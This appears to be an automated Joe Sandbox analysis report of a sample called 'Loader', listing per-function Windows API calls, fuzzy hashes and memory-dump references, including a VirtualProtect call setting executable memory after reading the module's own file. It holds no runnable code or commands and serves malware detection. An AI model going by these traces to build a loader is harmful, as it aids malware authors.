Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: 545dcd50440803feeeffaaf553baa77214f2ed0dcbdd5303a2746b935597ba64
Instruction ID: e35bf36a58780b6ffa62a5f4df72ed1e585685b6f74391aa2cd27689b913df63
Opcode Fuzzy Hash: 545dcd50440803feeeffaaf553baa77214f2ed0dcbdd5303a2746b935597ba64
Instruction Fuzzy Hash: DAF0FEB1A00A016BCB255B75DC48A5A3AAEAF00374B18C614F86DC71A1DB61DD528790

Function 00A7565F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000002,?,00A75721,00A78396,00A78396,?,00000002,A877E463,00A78396,00000002), ref: 00A75670
TerminateProcess.KERNEL32(00000000,?,00A75721,00A78396,00A78396,?,00000002,A877E463,00A78396,00000002), ref: 00A75677
ExitProcess.KERNEL32 ref: 00A75689

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 56640f7b66a4f9e895d233cb8f725bf15bf460f4e8d6faad79b0a047db342f7e
Instruction ID: 03caf76b14b42bda7362ba17638941da6d7807fe14c7fdbdd81c4b83fe7883c4
Opcode Fuzzy Hash: 56640f7b66a4f9e895d233cb8f725bf15bf460f4e8d6faad79b0a047db342f7e
Instruction Fuzzy Hash: 26D09E31500544BBCF016FB1DD0D8593F2BEF40381748C411B95949072DF729952DA44

Function 00A83BF4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A83F9E: GetConsoleOutputCP.KERNEL32(A877E463,00000000,00000000,?), ref: 00A84001

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00A78584,?), ref: 00A83D79
GetLastError.KERNEL32(?,?,00A78584,?,00A787C8,00000000,?,00000000,00A787C8,?,?,?,00A98FE8,0000002C,00A786B4,?), ref: 00A83D83

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 71dcff3fcee76d2adb3275e31a729223db50cfbb7521f555b0d8e7b768a800e8
Instruction ID: a70e5b0aa70e05f9406775ce6c398313a3740fd7a424dff40a398c0783b746e9
Opcode Fuzzy Hash: 71dcff3fcee76d2adb3275e31a729223db50cfbb7521f555b0d8e7b768a800e8
Instruction Fuzzy Hash: 0661B2B2D0411AAFDF11EFA8C984AEEBFB9BF49704F140545E800A7252D732DA15CBA0

Function 00A843CD Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00A83D5F,00000000,00A787C8,?,00000000,?,00000000), ref: 00A84469
GetLastError.KERNEL32(?,00A83D5F,00000000,00A787C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00A78584), ref: 00A8448F

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 6b04c7c11535b779fd06647c298d41af8d8dd481c90e677469d4f08ab9a18705
Instruction ID: c406dda63469a435eeefa8af191cbeedf908cb70a5289d9e56755ebd375d1fad
Opcode Fuzzy Hash: 6b04c7c11535b779fd06647c298d41af8d8dd481c90e677469d4f08ab9a18705
Instruction Fuzzy Hash: 15217135A00219DBCB19DF6ADD80AE9B7B9FF4C305F2484AAE906D7211D630DD42CB64

Function 00A690F0 Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00A691C9
std::_Throw_Cpp_error.LIBCPMT ref: 00A691D7

Part of subcall function 00A6EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00A68E4A,00A6A2F0), ref: 00A6EFE7

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
String ID:
API String ID: 3666349979-0
Opcode ID: 921bb2ceffa45e3ed3fdecabf85b93bab02c6f0f857056fb00604de9b5edb289
Instruction ID: dfa8458c7a96f6f6c7ab05bb3621d3e21cec857e73fb11ed75b927dd56b297f9
Opcode Fuzzy Hash: 921bb2ceffa45e3ed3fdecabf85b93bab02c6f0f857056fb00604de9b5edb289
Instruction Fuzzy Hash: 5D21E5B1A00646DBDB10DF64CE45BAEBBB5FF05320F144229E5296B3C1D734A945CBD2

Function 00A7DA52 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00A7D941,00A99330,0000000C), ref: 00A7DA9E
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00A7D941,00A99330,0000000C), ref: 00A7DAB0

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 6c098c866990a5883ebec36c6ed7c221e428ee53cf9c18428f57119d921e0717
Instruction ID: a9db6dc079bf3367094e9edef097d1dbe5e2a03fd3ff772df938b56b681bc661
Opcode Fuzzy Hash: 6c098c866990a5883ebec36c6ed7c221e428ee53cf9c18428f57119d921e0717
Instruction Fuzzy Hash: 9611B471208B524ACB308F3E8C886227BB5BF563B4B38C75AD0BE865F1C674D886D600

Function 00A61EF0 Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A61240: _strlen.LIBCMT ref: 00A612BA

FreeConsole.KERNELBASE(?,?,?,?,?,00A6173F,?,?,?,00000000,?), ref: 00A61F21
VirtualProtect.KERNELBASE(00A9A011,00000549,00000040,?), ref: 00A61F78

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ConsoleFreeProtectVirtual_strlen
String ID:
API String ID: 1248733679-0
Opcode ID: fd39bb37a196d778274e4df4a7ca8801eaf5b7d55168919b416c7cd63dfc534a
Instruction ID: 3c363a684ed2e042206cb384f71b7b3253663c47ef31ec0be7559d27a447243e
Opcode Fuzzy Hash: fd39bb37a196d778274e4df4a7ca8801eaf5b7d55168919b416c7cd63dfc534a
Instruction Fuzzy Hash: 7D11A375B001047BDB04BBA4DC06EFE7BB4EB54711F04442AF605A72C2EA75595187D1

Function 00A75470 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00A98E38,0000000C), ref: 00A75483
ExitThread.KERNEL32 ref: 00A7548A

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: f64505a94a85314c4314d76b5032160efe90168e4d0a5d56d088f573c2488a58
Instruction ID: bf2b4aa73a83b4d0a5e289526037f9a753a63b73e1a2a33b4a2a6a1107d11fd4
Opcode Fuzzy Hash: f64505a94a85314c4314d76b5032160efe90168e4d0a5d56d088f573c2488a58
Instruction Fuzzy Hash: F9F0C271A00604AFDB10AFB0CD1AA6E3B70FF00751F10C55AF0099B292CF745D42CB50

Function 00A62270 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00A62288
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00A6229C

Part of subcall function 00A61FB0: CreateFileA.KERNELBASE ref: 00A62036
Part of subcall function 00A61FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00A62046
Part of subcall function 00A61FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00A6206B
Part of subcall function 00A61FB0: CloseHandle.KERNELBASE(00000000), ref: 00A6207A
Part of subcall function 00A61FB0: _strlen.LIBCMT ref: 00A620CD

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: File$HandleModule$CloseCreateNameReadSize_strlen
String ID:
API String ID: 3505371420-0
Opcode ID: 3232591d2f4abb42c7b6aba16d7b1f7621fd2647b164adf7bab25c2edc17b585
Instruction ID: 9de13230fc644c5f01b6f33ecbb85bdf6f9677316357738fbeae8da949c57175
Opcode Fuzzy Hash: 3232591d2f4abb42c7b6aba16d7b1f7621fd2647b164adf7bab25c2edc17b585
Instruction Fuzzy Hash: 3BF0EDB1A002102BD221A764BD4BEAF7BBCDF99711F004919F6895A281EE7421568AA3

Function 00A7BED7 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00A802B4,?,00000000,?,?,00A7FF54,?,00000007,?,?,00A8089A,?,?), ref: 00A7BEED
GetLastError.KERNEL32(?,?,00A802B4,?,00000000,?,?,00A7FF54,?,00000007,?,?,00A8089A,?,?), ref: 00A7BEF8

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9b778245aac8560049512f855b52f43dce577d5488ea33f1284d01ebcada27d6
Instruction ID: a597b3f3409c6ca21afc0b80d720ee4c84254863d1c1183a963f2b434fceb919
Opcode Fuzzy Hash: 9b778245aac8560049512f855b52f43dce577d5488ea33f1284d01ebcada27d6
Instruction Fuzzy Hash: 5DE08C72204614ABCB116FF4AC48B993BA8EF40791F10C022F61C9A170CF308C51CBA8

Function 00A6DEF0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ddb837bb8487b266703312ef1bab2e28769fcb34c79d855f4488c71429ea386
Instruction ID: 5427989405e5ec7729b86dca6abbc450a3a6983ffaaf9ffbd34ff3321c7d879d
Opcode Fuzzy Hash: 4ddb837bb8487b266703312ef1bab2e28769fcb34c79d855f4488c71429ea386
Instruction Fuzzy Hash: AC41A335A0011AAFCB14DFA8C9948EDB7F9FF18354F64406AE442E7640EB31F945DB90

Function 00A6CB40 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14f6ae21962e8b456b491bc932fc39caded2615c317c55881fdda50fb9767fb4
Instruction ID: 315eaa32b87ad9ff6ff46c1c2d81ef9a6de92b249af0bf37c4cd006904f622ba
Opcode Fuzzy Hash: 14f6ae21962e8b456b491bc932fc39caded2615c317c55881fdda50fb9767fb4
Instruction Fuzzy Hash: DE318472A0051AAFCB14DF68D9909FEB7B8FF09330B14426AE556E7690E731F944CB90

Function 00A6B060 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00A6AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00A68A2A,?,?,00A6AF87,00A68A2A,?,00A6AF58,00A68A2A,?,?,?), ref: 00A6AFD0

FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,A877E463,?,?,?,Function_0002BE94,000000FF), ref: 00A6B0C7

Part of subcall function 00A6AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 00A6AF1B

Part of subcall function 00A6EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00A68E4A,00A6A2F0), ref: 00A6EFE7

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
String ID:
API String ID: 3627539351-0
Opcode ID: 09a41a640706a1454e156a539a00d7484fbd27eeae272f9d364bc340f05a932f
Instruction ID: d27f89406dd5104146a8bf1d6504fe53403d37400adb54cb348c7b0ca0a55faf
Opcode Fuzzy Hash: 09a41a640706a1454e156a539a00d7484fbd27eeae272f9d364bc340f05a932f
Instruction Fuzzy Hash: 4111C432744A11ABCB25ABA59E11A2E7BB5EF51B30F00441BF512D77D1CF35E841CE61

Function 00A7CFD6 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09990477f30ff6ff3373430973f0316b9294e9ccb194ef80c5132be7722d00f0
Instruction ID: 00bd113e2d2c4225cbba4ba083a650176db20fbf63ca19f740d63a21f67dd8b6
Opcode Fuzzy Hash: 09990477f30ff6ff3373430973f0316b9294e9ccb194ef80c5132be7722d00f0
Instruction Fuzzy Hash: 2A0192333102156B9B16CFA8ED41D56337ABFC0760B25D526FA1A9B194DF31D90396A0

Function 00A6CB32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: e4f173b6de10c910f50d2da8cefaa9ef3d470a802abc8e93a3561a132d7fd20b
Instruction ID: c248cfa9ce848bc1701905321d29a1d9d2535d0988bc4d1fb280c2cdc42e21e2
Opcode Fuzzy Hash: e4f173b6de10c910f50d2da8cefaa9ef3d470a802abc8e93a3561a132d7fd20b
Instruction Fuzzy Hash: 120144767082865ECF159B38F9296B9BB30FF95334B20816FD0A5894C1CB135820C700

Function 00A67770 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00A677C6

Part of subcall function 00A6AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,00A678DA,00000000), ref: 00A6AF72

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
String ID:
API String ID: 312417170-0
Opcode ID: 7986d1aeb732ed587157d9114c4ddc6f75b42916034b3c98a1723022d2d398e8
Instruction ID: b01430884eabf83aad2c986575c40ccdc020129823beb06b7493ce384a6fbb43
Opcode Fuzzy Hash: 7986d1aeb732ed587157d9114c4ddc6f75b42916034b3c98a1723022d2d398e8
Instruction Fuzzy Hash: BE0128B1C006599BDB00EF94D94579EBBB4FB44720F00423AE81967350E379AA45CAD2

Function 00A7BF11 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00A7DF35,?,?,00A7DF35,00000220,?,00000000,?), ref: 00A7BF43

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4eba9906e3d719bf8cbf0dac8971599a870b310d5be6fe0e42c37030cbe750e5
Instruction ID: a90321b005ce842c30f7a7b00c93a73335c2b4f12fef74a4cf85a6ae3ceeabd5
Opcode Fuzzy Hash: 4eba9906e3d719bf8cbf0dac8971599a870b310d5be6fe0e42c37030cbe750e5
